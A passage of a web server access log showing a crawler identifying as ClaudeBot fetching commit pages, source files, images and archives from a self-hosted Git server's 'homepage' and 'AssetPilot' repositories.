192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png?display=rendered" [Client 216.73.216.188] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2Fassets%2Fimages%2FControlRoom2.png" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 216.73.216.188] [Length 11021] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Factivate" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fmail_contact.py" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fassets%2Fjs%2Fi18n.js" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 30193] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9878] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.zip" [Client 216.73.216.188] [Length 28316755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fdotenv" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:16 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnginx-reverse-proxy.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 11169] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 216.73.216.188] [Length 11022] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2F.Backup%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host%2F4.conf" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2FDockerfile" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py?display=rendered" [Client 216.73.216.188] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10921] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host%2F3.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 216.73.216.188] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx?display=rendered" [Client 216.73.216.188] 